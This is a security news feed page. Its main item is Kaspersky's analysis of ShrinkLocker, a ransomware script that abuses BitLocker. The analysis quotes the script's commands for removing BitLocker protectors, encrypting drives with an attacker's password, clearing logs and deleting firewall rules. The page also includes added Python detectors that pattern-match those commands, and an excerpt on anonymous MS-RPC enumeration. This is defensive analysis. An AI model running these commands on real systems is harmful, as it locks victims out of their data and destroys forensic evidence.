Viruses and Worms

Three-year-old Apache Flink flaw under active attack

The Register - Anti-Virus - 24 May 2024 - 02:59
We know IT admins have busy schedules but c'mon

An improper access control bug in Apache Flink that was fixed in January 2021 has been added to the US government's Known Exploited Vulnerabilities Catalog, meaning criminals are right now abusing the flaw in the wild to compromise targets.…

Category: Viruses and Worms

Here's yet more ransomware using BitLocker against Microsoft's own users

The Register - Anti-Virus - 23 May 2024 - 23:21
ShrinkLocker throws steel and vaccine makers into the hurt locker

Updated: Yet more ransomware is using Microsoft BitLocker to encrypt corporate files, steal the decryption key, and then extort a payment from victim organizations, according to Kaspersky.…

Category: Viruses and Worms

Casino cyberattacks put a bullseye on Scattered Spider – and the FBI is closing in

The Register - Anti-Virus - 23 May 2024 - 22:16
Mandiant CTO chats to The Reg about the looming fate of this ransomware crew

Interview: The cyberattacks against Las Vegas casinos over the summer put a big target on the backs of prime suspects Scattered Spider, according to Mandiant CTO Charles Carmakal.…

Category: Viruses and Worms

Google guru roasts useless phishing tests, calls for fire drill-style overhaul

The Register - Anti-Virus - 23 May 2024 - 21:01
Current approaches aren't working and demonize security teams

A Google security bigwig has had enough of federally mandated phishing tests, saying they make colleagues hate IT teams for no added benefit.…

Category: Viruses and Worms

Veeam says critical flaw can't be abused to trash backups

The Register - Anti-Virus - 23 May 2024 - 16:30
It's still a rough one, so patch up

Veeam says the recent critical vulnerability in its Backup Enterprise Manager (VBEM) can't be used by cybercriminals to delete an organization's backups.…

Category: Viruses and Worms

70% of CISOs worry their org is at risk of a material cyber attack

The Register - Anti-Virus - 23 May 2024 - 15:30
Wait, why do you want this job again?

Chief information security officers around the globe "are nervously looking over the horizon," according to a survey of 1,600 CISOs that found more than two thirds (70 percent) worry their organization is at risk of a material cyber attack over the next 12 months. …

Category: Viruses and Worms

ShrinkLocker: Turning BitLocker into ransomware

Kaspersky Securelist - 23 May 2024 - 14:00


Attackers always find creative ways to bypass defensive features and accomplish their goals. This can be done with packers, crypters, and code obfuscation. However, one of the best ways of evading detection, as well as maximizing compatibility, is to use the operating system’s own features. In the context of ransomware threats, one notable example is leveraging exported functions present in the cryptography DLL ADVAPI32.dll, such as CryptAcquireContextA, CryptEncrypt, and CryptDecrypt. In this way, the adversaries can make sure that the malware can run and simulate normal behavior in various versions of the OS that support this DLL.

Although this seems smart enough, another clever technique caught our attention in a recent incident response engagement: using the native BitLocker feature to encrypt entire volumes and then stealing the decryption key. The original purpose of BitLocker is to address the risks of data theft or exposure from lost, stolen, or improperly decommissioned devices. Nonetheless, threat actors have found out that this mechanism can be repurposed for malicious ends to great effect.

In that incident, the attackers were able to deploy and run an advanced VBS script that took advantage of BitLocker for unauthorized file encryption. We spotted this script and its modified versions in Mexico, Indonesia, and Jordan. In the sections below, we analyze in detail the malicious code obtained during our incident response effort and provide tips for mitigating this kind of threat.

This is not the first time we have seen BitLocker used for encrypting drives and demanding a ransom. Previously, attackers used this Microsoft utility to encrypt critical systems after accessing and controlling these. In this case, however, the adversary took additional steps to maximize the damage from the attack and hinder an effective response to the incident.

VBScript analysis

One interesting fact is that the attackers did not bother to obfuscate the bulk of the code, as threat actors typically do. The most plausible explanation for this is that they already had full control of the target system when the script was executed. It is stored at C:\ProgramData\Microsoft\Windows\Templates\ as Disk.vbs. Its first lines contain a function that converts a string to its binary representation using an ADODB.Stream object. This function is later used for encoding data to be sent in an HTTP POST request.

Stream_StringToBinary function

The first step by the main function of the script is to use Windows Management Instrumentation (WMI) to query information about the operating system with the help of the Win32_OperatingSystem class. For each object within the query results, the script checks if the current domain is different from the target. If it is, the script finishes automatically. After that, it checks if the name of the operating system contains “xp”, “2000”, “2003”, or “vista”, and if the Windows version matches any one of these, the script finishes automatically and deletes itself.

Initial conditions for execution

After that, the script continues to rely on WMI for querying information about the OS. It then performs disk resizing operations, which may vary with the result of the OS version check. These operations are performed solely on fixed drives (DriveType = 3). The following drive types typically exist in a file system:

    $DriveType_map = @{
        0 = 'Unknown'
        1 = 'No Root Directory'
        2 = 'Removable Disk'
        3 = 'Local Disk'        # This is the DriveType searched by the malware
        4 = 'Network Drive'
        5 = 'Compact Disc'
        6 = 'RAM Disk'
    }

The likely reason the malware does not try to perform the same operations on network drives (DriveType = 4) is to avoid triggering detection tools on the network.

To resize local drives in Windows Server 2008 or 2012, the script checks the primary boot partition and saves this information. It saves the index of the different partitions and then performs the following actions using diskpart:

  • Shrink the size of each non-boot partition by 100 MB. This creates 100 MB in unallocated space in each partition other than the boot volume;
  • Split the unallocated space into new 100 MB primary partitions;
  • Format the partitions with the override option, which forces the volume to dismount first if necessary, and assigns a file system and a drive letter to each;
  • Activate the partitions;
  • If the shrink procedure was successful, save “ok” as a variable, so the script can continue.

Disk resizing operations performed by the script in Windows Server 2008 and 2012

If the operation is successful, the code uses the utility bcdboot and the drive letter saved previously as a boot volume to reinstall the boot files on the new primary partitions.

Boot files reinstall

The partition shrink operations for other OS versions are similar but implemented with a different piece of code for compatibility reasons. The example below shows the process as applied to the Windows versions 7, 8, and 8.1.

Disk resizing operations in the Windows versions 7, 8, or 8.1

For Windows 2008 or 7, after the partition shrink procedure finishes, the variable matchedDrives saves the drive letters separated by commas, but only if the file system is NTFS, exFAT, FAT32, ReFS, or FAT. The code was modified to print an example:

matchedDrives variable data

The script then adds the following registry entries:

  • fDenyTSConnections = 1: disables RDP connections;
  • scforceoption = 1: enforces smart card authentication;
  • UseAdvancedStartup = 1: requires the use of the BitLocker PIN for pre-boot authentication;
  • EnableBDEWithNoTPM = 1: allows BitLocker without a compatible TPM chip;
  • UseTPM = 2: allows the use of TPM if available;
  • UseTPMPIN = 2: allows the use of a startup PIN with TPM if available;
  • UseTPMKey = 2: allows the use of a startup key with TPM if available;
  • UseTPMKeyPIN = 2: allows the use of a startup key and PIN with TPM if available;
  • EnableNonTPM = 1: allows BitLocker without a compatible TPM chip, requires a password or startup key on a USB flash drive;
  • UsePartialEncryptionKey = 2: requires the use of a startup key with TPM;
  • UsePIN = 2: requires the use of a startup PIN with TPM.

If the script detects an error, it restarts the system.

Registry modifications

By analyzing the malware dynamically, we can confirm the registry changes performed:

    HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMPIN: 0x00000002
    HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMKey: 0x00000002
    HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMKeyPIN: 0x00000002
    HKLM\SOFTWARE\Policies\Microsoft\FVE\EnableNonTPM: 0x00000001
    HKLM\SOFTWARE\Policies\Microsoft\FVE\UsePartialEncryptionKey: 0x00000002
    HKLM\SOFTWARE\Policies\Microsoft\FVE\UsePIN: 0x00000002
    HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseAdvancedStartup: 0x00000001
    HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\EnableBDEWithNoTPM: 0x00000001
    HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPM: 0x00000002
    HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMPIN: 0x00000002
    HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMKey: 0x00000002
    HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMKeyPIN: 0x00000002
    HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\EnableNonTPM: 0x00000001
    HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UsePartialEncryptionKey: 0x00000002
    HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UsePIN: 0x00000002

Interestingly enough, there are several functions performing these operations, each designed for a different version of Windows. In some conditionals, it checks if BitLocker Drive Encryption Tools are active through the ID 266 of Remote Server Administration Tools. The malware then checks if the BitLocker Drive Encryption Service (BDESVC) is running. If not, it starts the service.

BDESVC verification

The script also changes the label of the new boot partitions to the attacker’s email as shown in the images below, so the victim can contact them.

Drive label modification

Attacker’s email as a drive label

After that, the malware disables the protectors used to secure BitLocker’s encryption key and deletes them. The deletion method may vary depending on the version of the OS. In a Windows Server 2008 or Windows 7 scenario, this is accomplished via VBS features, after which the script uses PowerShell to force the deletion of the protectors.

Having completed the deletion, it enables the use of a numerical password as a protector and the encryption feature.

Protectors deletion

The reason for deleting the default protectors is to avoid the recovery of the keys by the user, as in the example below.

The recovery of BitLocker keys

As the next step, the 64-character encryption key is generated by the malware using a random multiplication and replacement of the following elements:

  • A variable with the numbers 0–9;
  • The famous pangram, “The quick brown fox jumps over the lazy dog”, in lowercase and uppercase, which contains every letter of the English alphabet;
  • Special characters.

The randomness of this password is accomplished by a seed made of various elements of the affected system, such as used memory and network statistics. Later, this information is sent to the attacker. We tested the key generation logic in our environment, and with a slight modification of the script, we were able to see the generated password.

Key generation process

The code then converts the previously generated encryption key to a secure string—a PowerShell option that prevents creating a string object in memory—and effectively enables BitLocker on the drives.

    If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command ""$protectors = (Get-BitLockerVolume -MountPoint " & drives(i) & ").KeyProtector; if ($protectors -ne $null) { foreach ($protector in $protectors) { Remove-BitLockerKeyProtector -MountPoint " & drives(i) & " -KeyProtectorId $protector.KeyProtectorId } }""")).stdout.readall) > 0 Then: End If
    If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command $a=ConvertTo-SecureString " & Chr(34) & Chr(39) & strRandom & Chr(39) & Chr(34) & " -asplaintext -force;Enable-BitLocker " & drives(i) & " -s -qe -pwp -pw $a")).stdout.readall) > 0 Then: End If
    If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command Resume-BitLocker -MountPoint " & drives(i) & " ")).stdout.readall) > 0 Then: End If

The script then creates an HTTP POST request object using the following options:

  • Use WinHTTP version 5.1.
  • Accept the French language.
  • Ignore SSL errors (httpRequest.Option(4) = 13056 → WinHttpRequestOption_SslErrorIgnoreFlags).
  • Disable redirects (httpRequest.Option(6) = false → WinHttpRequestOption_EnableRedirects).

The attackers used the domain to obfuscate their real address. This domain is legitimate: it belongs to CloudFlare and is used to provide quick tunnels for developers. The subdomain configured by the attackers was scottish-agreement-laundry-further.

Request creation

The malware also includes information about the machine and the generated password as a payload for the POST request, as shown in the image below.

Information to be sent in the POST request

The script also contains a loop that tries to send the information to the attacker five times if an error occurs.

Retry procedure

With some tweaks, we were able to print the data being sent to the attacker, as shown in the image below. Note that the data includes the computer name, Windows version, drives affected, and the password string. Consequently, the victim’s IP address will also be logged on the attacker’s server, allowing them to track each victim.

Information to be sent

After removing the BitLocker protectors and configuring drive encryption, the script goes through the following steps to cover its tracks.

It validates if the hostname is the target of this malware, then deletes the files:

  • \Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
  • \scripts\Login.vbs
  • \scripts\Disk.vbs
  • C:\ProgramData\Microsoft\Windows\Templates\Disk.vbs

Delete operations

The script then clears the Windows PowerShell and Microsoft-Windows-PowerShell/Operational logs with wevtutil. It turns on the system firewall and deletes all of its rules. It also deletes the tasks VolumeInit and VolumeCheck. Finally, the malware performs a forced shutdown.

    If Len((CreateObject("WScript.Shell").Exec("wevtutil cl ""Windows PowerShell""")).stdout.readall) > 0 Then: End If
    If Len((CreateObject("WScript.Shell").Exec("wevtutil cl ""Microsoft-Windows-PowerShell/Operational""")).stdout.readall) > 0 Then: End If
    If Len((CreateObject("WScript.Shell").Exec("netsh advfirewall set allprofiles state on")).stdout.readall) > 0 Then: End If
    If Len((CreateObject("WScript.Shell").Exec("netsh advfirewall firewall delet rule name=all")).stdout.readall) > 0 Then: End If
    If Len((CreateObject("WScript.Shell").Exec("schtasks /Delete /TN ""VolumeInit"" /F")).stdout.readall) > 0 Then: End If
    If Len((CreateObject("WScript.Shell").Exec("schtasks /Delete /TN ""VolumeCheck"" /F")).stdout.readall) > 0 Then: End If

After the shutdown, the victim will see the BitLocker screen. If the user tries to use the recovery options, they will see nothing but the message, “There are no more BitLocker recovery options on your PC”.

BitLocker recovery screen
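The actions the script chains together (protector removal, a password-only Enable-BitLocker, FVE policy changes that allow encryption without a TPM, PowerShell log clearing, firewall rule deletion) are exactly the kind of behaviour that survives string changes to the VBS file. As an added example, not code from the article or from Kaspersky, the following Python matcher runs those indicators over constructed sample telemetry (PowerShell script-block text and registry-change records modelled on the commands quoted above, not real logs) and returns a verdict only when encryption activity co-occurs with anti-forensics. The rule names and the log line format are assumptions; the technique IDs are the ones in the article's TTP table.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


# Each rule pairs a regex over a logged command line or registry-change record
# with the ATT&CK technique ID the article's TTP table assigns to that action.
@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    pattern: re.Pattern


RULES = [
    Rule("bitlocker_protector_removal", "T1486",
         re.compile(r"Remove-BitLockerKeyProtector", re.I)),
    # A password-only protector (-pw / -PasswordProtector) is what the script adds
    # after deleting the defaults; a TPM or recovery-password protector is not flagged.
    Rule("bitlocker_enable_with_password", "T1486",
         re.compile(r"Enable-BitLocker\b.*\s-(pw|pwp|PasswordProtector)\b", re.I)),
    Rule("securestring_from_plaintext", "T1486",
         re.compile(r"ConvertTo-SecureString\b.*-asplaintext", re.I)),
    Rule("fve_policy_allows_no_tpm", "T1112",
         re.compile(r"\\Policies\\Microsoft\\FVE\\(EnableBDEWithNoTPM|EnableNonTPM)\b.*\b1\b", re.I)),
    Rule("rdp_disabled", "T1112",
         re.compile(r"fDenyTSConnections\b.*\b1\b", re.I)),
    Rule("powershell_log_cleared", "T1070.001",
         re.compile(r"wevtutil\s+cl\s+\"?(Windows PowerShell|Microsoft-Windows-PowerShell/Operational)", re.I)),
    # netsh accepts unambiguous prefixes, so "delet" is matched as well as "delete".
    Rule("firewall_rules_deleted", "T1562.004",
         re.compile(r"netsh\s+advfirewall\s+firewall\s+delet\w*\s+rule\s+name=all", re.I)),
]


def match_event(event: str) -> list[Rule]:
    """Return every rule whose pattern fires on one logged line."""
    return [r for r in RULES if r.pattern.search(event)]


def analyze(events: list[str]) -> dict[str, list[int]]:
    """Map rule name -> indices of the events that triggered it."""
    hits: dict[str, list[int]] = {}
    for i, ev in enumerate(events):
        for r in match_event(ev):
            hits.setdefault(r.name, []).append(i)
    return hits


def techniques_hit(events: list[str]) -> set[str]:
    fired = analyze(events)
    return {r.technique for r in RULES if r.name in fired}


def verdict(events: list[str]) -> str:
    """Encryption activity alone is worth a review; paired with registry,
    log or firewall tampering it matches the pattern described in the article."""
    t = techniques_hit(events)
    impact = "T1486" in t
    evasion = bool(t & {"T1112", "T1070.001", "T1562.004"})
    if impact and evasion:
        return "suspicious"
    if impact:
        return "review"
    return "benign"


# Constructed sample telemetry (not real logs), modelled on the article's quoted
# commands: PowerShell script-block text and registry-change records.
SAMPLE_EVENTS = [
    "powershell.exe -Command $protectors = (Get-BitLockerVolume -MountPoint C:).KeyProtector; "
    "foreach ($protector in $protectors) { Remove-BitLockerKeyProtector -MountPoint C: "
    "-KeyProtectorId $protector.KeyProtectorId }",
    "powershell.exe -Command $a=ConvertTo-SecureString '<redacted>' -asplaintext -force;"
    "Enable-BitLocker C: -s -qe -pwp -pw $a",
    r"RegistrySetValue HKLM\SOFTWARE\Policies\Microsoft\FVE\EnableBDEWithNoTPM = 1",
    r"RegistrySetValue HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections = 1",
    'wevtutil cl "Microsoft-Windows-PowerShell/Operational"',
    "netsh advfirewall firewall delet rule name=all",
]

# Ordinary administration that must not raise a verdict.
BENIGN_EVENTS = [
    "Get-BitLockerVolume",
    "Enable-BitLocker -MountPoint C: -TpmProtector -RecoveryPasswordProtector",
]

if __name__ == "__main__":
    for name, idx in analyze(SAMPLE_EVENTS).items():
        print(f"{name:32s} events {idx}")
    print("sample verdict:", verdict(SAMPLE_EVENTS))   # suspicious
    print("benign verdict:", verdict(BENIGN_EVENTS))   # benign
```

The verdict deliberately requires two tactic categories because every single indicator here has a legitimate counterpart (an administrator rotating protectors, a policy push that allows BitLocker on TPM-less hardware, a scheduled log rotation); the correlation, not the strings, is what distinguishes the script's behaviour.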

Tactics, techniques and procedures

The analysis showed that this threat actor has an extensive understanding of the VBScript language, and Windows internals and utilities, such as WMI, diskpart, and bcdboot. Below are the TTPs identified for this scenario.

    Tactic          | Technique                                       | ID
    Execution       | Command and Scripting Interpreter: Visual Basic | T1059.005
    Execution       | Windows Management Instrumentation              | T1047
    Execution       | Command and Scripting Interpreter: PowerShell   | T1059.001
    Impact          | Data Encrypted for Impact                       | T1486
    Impact          | System Shutdown/Reboot                          | T1529
    Defense evasion | Clear Windows Event Logs                        | T1070.001
    Defense evasion | Modify Registry                                 | T1112
    Defense evasion | Disable or Modify System Firewall               | T1562.004
    Exfiltration    | Exfiltration Over Web Service                   | T1041

Artifacts and digital forensics

As the local activity performed by the script includes cleaning up its traces, clearing some logs and the tasks created for execution, and finally, encrypting the whole drive, it was not easy to get forensic artifacts to identify the malicious activities and to find opportunities for decryption.

Fortunately, some of the script content and commands executed were registered and logged by a third-party service, and these were collected for analysis. This allowed us to obtain the secure strings to which the encryption keys were converted from some of the affected systems.

Secure strings obtained

Elsewhere, we attempted to collect network logs where the POST requests to the C2 were stored. However, the most common configuration for web activity logging includes GET but unfortunately not POST requests.

We did finally obtain the POST requests, but this was very challenging. The case provides justification for logging POST traffic and ensuring that all critical system activity is forwarded to a central repository with enough space for storing data for the recommended retention period (six or more months) to avoid losing evidence after attackers remove all their traces from the individual systems.

Finally, some systems in the customer’s infrastructure remained unencrypted and were considered unaffected at first. However, we later found out that they had, in fact, been affected, but BitLocker was not configured in these systems. This made it possible for us to obtain the script itself, analyze its behavior and collect further evidence.


While we could obtain some of the passphrases and fixed values implemented by the threat actor to create the encryption keys, the script includes some variable values, and those are different for each affected system, making the decryption process difficult.

Network information collected for use in the seed


Companies are encouraged to use BitLocker or other encryption tools (such as VeraCrypt) to protect corporate secrets. However, a few precautions must be taken to avoid the abuse by attackers.

  • Use a robust, properly configured EPP solution to detect threats that try to abuse BitLocker;
  • Implement Managed Detection and Response (MDR) to proactively scan for threats;
  • If BitLocker is enabled, make sure you are using a strong password and have the recovery keys stored in a secure location;
  • Ensure that users have only minimal privileges. This way, they cannot enable encryption features or change registry keys on their own;
  • Enable network traffic logging and monitoring. Configure the logging of both GET and POST requests. In case of infection, the requests made to the attacker’s domain may contain passwords or keys;
  • Monitor for events associated with VBS execution and PowerShell, and save the logged scripts and commands to an external repository storing activity that may be deleted locally;
  • Make backups frequently, store them offline, and test them.

If you need assistance with investigation of a ransomware attack and recovering encrypted data, please contact us at [email protected].


Our incident response and malware analysis are evidence that attackers are constantly refining their tactics to evade detection. In this incident, we observed the abuse of the native BitLocker feature for unauthorized data encryption. The VBS script demonstrates that the malicious actor involved in this attack has an excellent understanding of Windows internals. Although the script analysis was not complicated at all, this kind of threat is difficult to detect, since unique strings inside the artifact can be easily modified to bypass YARA rules. Therefore, the best detection method in scenarios like these is behavioral analysis, which correlates different actions performed by the application to reach a verdict.

Kaspersky products detect the threat described in this article with the following verdicts:

  • Trojan.VBS.SAgent.gen;
  • Trojan-Ransom.VBS.BitLock.gen;
  • Trojan.Win32.Generic.

Indicators of compromise


E-mail addresses:

MD5 hashes:

A journey into forgotten Null Session and MS-RPC interfaces

Kaspersky Securelist - 23 May 2024 - 11:00

A journey into forgotten Null Session and MS-RPC interfaces (PDF)

It has been almost 24 years since the null session vulnerability was discovered. Back then, it was possible to access SMB named pipes using empty credentials and collect domain information. Most often, attackers leveraged null sessions for gathering domain users through techniques such as RID (Relative Identifier) enumeration. RIDs uniquely identify users, groups, computers and other entities within the domain. To enumerate them, the attacker used MS-RPC interfaces to make some calls and collect information from the remote host.

To prevent such attacks, Microsoft restricted null session capabilities by limiting what an attacker can do after connecting to named pipes, and provided security policies that could be implemented to stop all null session activities. Today, although null sessions still exist and are enabled by default on domain controllers (most likely for compatibility purposes), most system administrators close this capability by hardening the security policies and monitoring domain controller activities, including anonymous access through SMB.

As penetration testers, we always pose the question: is it really as secure as it seems? In this case we asked if we can bypass policies and restrictions today, after 24 years, and bring the idea of anonymous access back to life. This research is tailored for security researchers and penetration testers seeking to enhance their understanding of MS-RPC interfaces and refine their research techniques. It’s important to note that all information in this article is intended for legitimate security research purposes only, and must not be used for illegal activities.

The research is divided into two parts. In this post we share the first part, devoted to the research methodology against MS-RPC interfaces, developed after observing some interesting behavior from one of the Windows interfaces. Also included is a discussion of how we can link this behavior to null sessions, and revive their legacy by enumerating information from the domain controller, specifically domain users without triggering any alerts.

About null session

Null sessions have emerged as a pivotal area of interest and concern within the field of cybersecurity. They occur when access to a network resource, most commonly the IPC$ “Windows Named Pipe” share, is granted with empty credentials. IPC$ (Inter-Process Communication) is a hidden share that processes on different computers use to communicate with each other. After obtaining anonymous access to this resource, an attacker can bind an MS-RPC interface exposed by a particular named pipe inside the IPC$ share, and start to gather information such as shares, users, groups, registry keys and much more.

In newer Windows versions, the null session capability has become more restricted, and is available in Windows servers that act as domain controller only. When you upgrade your server to a domain controller, null session access to the following named pipes is available by default:

  • “\pipe\netlogon”;
  • “\pipe\samr”;
  • “\pipe\lsarpc”.

To prevent null sessions, two related system policies were introduced: “Restrict anonymous access to Named Pipes and Shares” and “Network access: Named Pipes that can be accessed anonymously.” The first policy, “Restrict anonymous access to Named Pipes and Shares,” is enabled by default. The second policy, “Network access: Named Pipes that can be accessed anonymously,” contains the three named pipes we discussed earlier (netlogon, samr, and lsarpc). To prevent any action related to null sessions, the latter policy is set to empty so that none of these named pipes can be accessed anonymously.

Enumerating network interfaces without authentication

During my work in traffic analysis, I noticed many packets related to DCOM communications between domain controller and other endpoints, which were tagged by Wireshark under the IOXIDResolver RPC interface and the ServerAlive2() method. The IOXIDResolver interface is actually the IObjectExporter interface. As Microsoft mentions, it is used for OXID resolution, pinging and server aliveness tests. In brief, it helps in the process of locating and connecting to remote objects involved in resolving OXID references to actual network locations (such as IP addresses) of objects in a DCOM environment.

One of the IObjectExporter methods is ServerAlive2. The ServerAlive2 (OPNUM 5) method was introduced with version 5.6 of the DCOM Remote Protocol, and extends the ServerAlive method. It returns string and security bindings for the object resolver, which allows the client to choose the most appropriate settings, compatible with both client and server. The IObjectExporter interface uses TCP port 135 as an MS-RPC endpoint.

In the traffic for each TCP stream related to DCOM communication, there were four packets. The first is related to binding the IObjectExporter interface, the second to the server binding response, the third to the ServerAlive2 function call, and the final packet is the response for the ServerAlive2 function, which contains all the network interfaces for the domain controller.

Bind request packet

The image above shows a bind request for IObjectExporter interface. You can see that the Auth Length header is equal to zero, indicating that the authentication level is None, and hence, there is no authentication. With just two packets from the client, we can enumerate network interfaces for the remote host without authentication.
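As an added example (not from the article or its PDF), the following Python parser reads a DCE/RPC bind PDU far enough to recover the Auth Length field and the requested interface UUID, and flags the combination shown in the capture above: a bind to IObjectExporter with auth_length = 0. The IObjectExporter UUID (99fcfec4-5260-101b-bbcb-00aa0021347a) and the NDR 2.0 transfer-syntax UUID are the well-known MS-DCOM/DCE constants, not values from the page; the sample PDUs are constructed inline with a small builder so the block runs offline against no real host, which is also what a sensor parsing port 135 traffic would see.

```python
import struct
import uuid

# Interface UUID of IObjectExporter (IOXIDResolver) from MS-DCOM, version 0.0.
# Well-known constant; it does not appear in the article itself.
IOBJECTEXPORTER = uuid.UUID("99fcfec4-5260-101b-bbcb-00aa0021347a")
# NDR 2.0 transfer syntax identifier used by ordinary DCE/RPC binds.
NDR20 = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")

PTYPE_BIND = 11
HEADER_FMT = "<BBBB4sHHI"      # 16-byte common PDU header: vers, minor, ptype, flags, drep, frag_len, auth_len, call_id
BIND_BODY_FMT = "<HHIBxxx"     # max_xmit, max_recv, assoc_group, n_context_elem + 3 pad bytes


def parse_bind(pdu: bytes) -> dict:
    """Parse a bind PDU far enough to read auth_length and each requested
    abstract syntax (interface UUID + version). Little-endian drep only."""
    if len(pdu) < 16:
        raise ValueError("truncated PDU header")
    _vers, _minor, ptype, _flags, drep, frag_len, auth_len, call_id = struct.unpack_from(HEADER_FMT, pdu, 0)
    if (drep[0] & 0xF0) != 0x10:
        raise ValueError("only little-endian data representation handled here")
    if frag_len != len(pdu):
        raise ValueError("frag_length does not match PDU size")
    result = {"ptype": ptype, "auth_length": auth_len, "call_id": call_id, "contexts": []}
    if ptype != PTYPE_BIND:
        return result
    _xmit, _recv, _assoc, n_ctx = struct.unpack_from(BIND_BODY_FMT, pdu, 16)
    off = 28
    for _ in range(n_ctx):
        if off + 24 > len(pdu):
            raise ValueError("truncated presentation context")
        ctx_id, n_ts = struct.unpack_from("<HBx", pdu, off)
        # DCE wire order for a UUID under LE drep is exactly Python's bytes_le layout.
        iface = uuid.UUID(bytes_le=pdu[off + 4:off + 20])
        major, minor = struct.unpack_from("<HH", pdu, off + 20)
        off += 24
        syntaxes = []
        for _ in range(n_ts):
            syntaxes.append(uuid.UUID(bytes_le=pdu[off:off + 16]))
            off += 20                          # 16-byte UUID + 4-byte version
        result["contexts"].append({"ctx_id": ctx_id, "interface": iface,
                                   "version": (major, minor), "transfer_syntaxes": syntaxes})
    return result


def is_unauthenticated_oxid_bind(pdu: bytes) -> bool:
    """True when a bind targets IObjectExporter and carries no auth verifier,
    i.e. the Auth Length == 0 pattern shown in the article's capture."""
    info = parse_bind(pdu)
    if info["ptype"] != PTYPE_BIND:
        return False
    return info["auth_length"] == 0 and any(
        c["interface"] == IOBJECTEXPORTER for c in info["contexts"])


def build_bind(interface: uuid.UUID, version=(0, 0), auth_value: bytes = b"", call_id: int = 1) -> bytes:
    """Construct a minimal single-context bind PDU for exercising the parser
    (not a captured packet). A non-empty auth_value is wrapped in the 8-byte
    sec_trailer (auth type 10 = NTLM, level 6 = packet privacy); auth_length
    counts only the auth_value, as the protocol specifies."""
    ctx = (struct.pack("<HBx", 0, 1) + interface.bytes_le + struct.pack("<HH", *version)
           + NDR20.bytes_le + struct.pack("<I", 2))
    body = struct.pack(BIND_BODY_FMT, 5840, 5840, 0, 1) + ctx
    trailer = (struct.pack("<BBBBI", 10, 6, 0, 0, 0) + auth_value) if auth_value else b""
    frag_len = 16 + len(body) + len(trailer)
    header = struct.pack(HEADER_FMT, 5, 0, PTYPE_BIND, 0x03, b"\x10\x00\x00\x00",
                         frag_len, len(auth_value), call_id)
    return header + body + trailer


# Constructed samples: an anonymous IObjectExporter bind, the same bind carrying an
# NTLM auth verifier (placeholder bytes), and an anonymous bind to a made-up interface.
ANON_OXID_BIND = build_bind(IOBJECTEXPORTER)
AUTH_OXID_BIND = build_bind(IOBJECTEXPORTER, auth_value=b"NTLMSSP\x00" + b"\x01\x00\x00\x00" + b"\x00" * 28)
ANON_OTHER_BIND = build_bind(uuid.UUID("00000000-1111-2222-3333-444444444444"))

if __name__ == "__main__":
    for label, pdu in [("anon OXID", ANON_OXID_BIND), ("auth OXID", AUTH_OXID_BIND), ("anon other", ANON_OTHER_BIND)]:
        info = parse_bind(pdu)
        print(f"{label:10s} auth_length={info['auth_length']:3d} flagged={is_unauthenticated_oxid_bind(pdu)}")
```

Because every DCOM client legitimately performs this exchange, the flag is a counting signal rather than an alert on its own: a host that issues anonymous IObjectExporter binds to many servers in a short window looks very different from a workstation resolving one OXID reference.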

The idea struck me: what if there are other RPC interfaces vulnerable to no authentication? What kind of enumeration could be obtained from them? Can we map it to the famous null session? And what research strategy should I follow to find this out? In the full version of the research (PDF), I try to answer these questions, discuss a new path for enumerating domain information, and share a tool that implements the idea of this new path.

UK data watchdog wants six figures from N Ireland cops after 2023 data leak

The Register - Anti-Virus - 23 May 2024 - 10:30
Massive discount applied to save cop shop’s helicopter budget

Following a data leak that brought "tangible fear of threat to life", the UK's data protection watchdog says it intends to fine the Police Service of Northern Ireland (PSNI) £750,000 ($955,798).…

Category: Viruses and Worms

How Apple Wi-Fi Positioning System can be abused to track people around the globe

The Register - Anti-Virus - 23 May 2024 - 08:34
SpaceX is smart on this, Cupertino and GL.iNet not so much

In-depth: Academics have shown how Apple's Wi-Fi Positioning System (WPS) can be abused to create a global privacy nightmare.…

Category: Viruses and Worms

Would you buy Pegasus spyware from this scammer?

The Register - Anti-Virus - 23 May 2024 - 07:45
You shouldn't – Indian infosec researchers warn you'll get random junk instead

Indian infosec firm CloudSEK warned on Wednesday that scammers are selling counterfeit code advertised as the NSO Group's notorious Pegasus spyware.…

Category: Viruses and Worms

'China-aligned' spyware slingers operating since 2018 unmasked at last

The Register - Anti-Virus - 23 May 2024 - 05:47
Unfading Sea Haze adept at staying under the radar

Bitdefender says it has tracked down and exposed an online gang that has been operating since 2018 nearly without a trace – and likely working for Chinese interests.…

Category: Viruses and Worms

Lawmakers advance bill to tighten White House grip on AI model exports

The Register - Anti-Virus - 23 May 2024 - 02:16
Vague ML definitions subject to change – yeah, great

The House Foreign Affairs Committee voted Wednesday to advance a law bill expanding the White House's authority to police exports of AI systems – including models said to pose a national security threat to the United States.…

Category: Viruses and Worms

Go after UnitedHealth, not us, 100+ medical groups urge Uncle Sam

The Register - Anti-Virus - 23 May 2024 - 00:05
Why should we get its paperwork?

More than 100 medical industry groups have asked the Feds to make UnitedHealth Group, not them, go through the rigmarole of notifying everyone about the Change Healthcare ransomware infection.…

Category: Viruses and Worms

Canada's London Drugs confirms ransomware attack after LockBit demands $25M

The Register - Anti-Virus - 22 May 2024 - 22:00
Pharmacy says it's 'unwilling and unable to pay ransom'

Canadian pharmacy chain London Drugs has confirmed that ransomware thugs stole some of its corporate files containing employee information and says it is "unwilling and unable to pay ransom to these cybercriminals."…

Category: Viruses and Worms

NYSE parent gets $10M wrist tap for failing to report 2021 systems break-in

The Register - Anti-Virus - 22 May 2024 - 21:30
